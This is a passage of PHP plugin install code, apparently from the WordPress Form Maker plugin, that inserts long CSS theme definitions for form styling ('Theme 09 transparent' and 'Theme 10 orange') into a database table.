cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 09 transparent (lightgreen button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #30D1B1;\r\nmargin-bottom: 10px;\r\ncolor: #30D1B1;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #30D1B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 10 orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F7D3BB;\r\nborder: 1px solid #FAAA63;\r\nmargin-bottom: 10px;\r\ncolor: #FAAA63;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/01/next_hoverbg.png) url([SITE_ROOT]/images/01/01/previous_hover.png) url([SITE_ROOT]/images/01/01/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #000;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/01/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\n	background: #f58b33; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f58b33), color-stop(20%, #faaa63), color-stop(80%, #faaa63), 